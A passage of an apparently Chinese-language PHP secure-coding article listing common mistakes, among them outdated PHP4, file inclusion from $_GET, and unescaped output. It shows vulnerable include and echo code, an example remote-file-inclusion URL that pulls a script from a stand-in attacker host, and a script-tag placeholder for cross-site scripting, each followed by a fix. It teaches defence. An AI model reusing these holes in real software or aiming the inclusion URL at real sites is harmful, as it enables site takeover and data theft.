4、使用舊版本的PHP

 

很多程序員還在使用PHP4，在PHP4上開發(fā)不能充分發(fā)揮PHP的潛能，還存在一些安全的隱患。轉(zhuǎn)到PHP5上來吧，并不費很多功夫。大部分PHP4程序只要改動很少的語句甚至無需改動就可以遷移到PHP5上來。根據(jù)http://www.nexen.net的調(diào)查只有12%的PHP服務(wù)器使用PHP5，所以有88%的PHP開發(fā)者還在使用PHP4。

 

5、不知道PHP中已經(jīng)有的功能

 

PHP 的核心包含很多功能。很多程序員重復(fù)的發(fā)明輪子。浪費了大量時間。編碼之前搜索一下PHP mamual，在google上檢索一下，也許會有新的發(fā)現(xiàn)！PHP中的exec()是一個強大的函數(shù)，可以執(zhí)行cmd shell，并把執(zhí)行結(jié)果的最后一行以字符串的形式返回?？紤]到安全可以使用EscapeShellCmd()。

7、Require 或 include 的文件使用不安全的數(shù)據(jù)

 

再次強調(diào)：不要相信不是你自己顯式聲明的數(shù)據(jù)。不要 Include 或 require 從$_GET, $_POST 或 $_COOKIE 中得到的文件。

 

例如:

 

 

index.php 

<? 

//including header, config, database connection, etc 

include($_GET['filename']); 

//including footer 

?>

 

現(xiàn)在任一個****現(xiàn)在都可以用:

 

http://www.yourdomain.com/index.php?filename=anyfile.txt

 

來獲取你的機密信息，或執(zhí)行一個PHP腳本。

 

如果allow_url_fopen=On，你更是死定了：

 

試試這個輸入：

 

http://www.yourdomain.com/index.php?filename=http%3A%2F%2Fdomain.com%2Fphphack.php

 

現(xiàn)在你的網(wǎng)頁中包含了http://www.youaredoomed.com/phphack.php的輸出. ****可以發(fā)送垃圾郵件，改變密碼，刪除文件等等。只要你能想得到。

 

如何修復(fù)：

 

你必須自己控制哪些文件可以包含在的include或require指令中。

 

下面是一個快速但不全面的解決方法：

 

 

<? 

//Include only files that are allowed. 

$allowedFiles = array('file1.txt','file2.txt','file3.txt'); 

if(in_array((string)$_GET['filename'],$allowedFiles)) { 

include($_GET['filename']); 

} 

else{ 

exit('not allowed'); 

} 

?>

 

8、不轉(zhuǎn)意html entities

 

一個基本的常識：所有不可信任的輸入（特別是用戶從form中提交的數(shù)據(jù)） ，輸出之前都要轉(zhuǎn)意。

 

echo $_GET['usename'] ;

 

這個例子有可能輸出：

 

<scrīpt>/*更改admin密碼的腳本或設(shè)置cookie的腳本*/</scrīpt>

 

這是一個明顯的安全隱患，除非你保證你的用戶都正確的輸入。

 

如何修復(fù) ：

 

我們需要將"< ",">","and" 等轉(zhuǎn)換成正確的HTML表示(< , >', and ")，函數(shù)htmlspecialchars 和 htmlentities()正是干這個活的。

 

正確的方法：

 

echo htmlspecialchars($_GET['username'], ENT_QUOTES);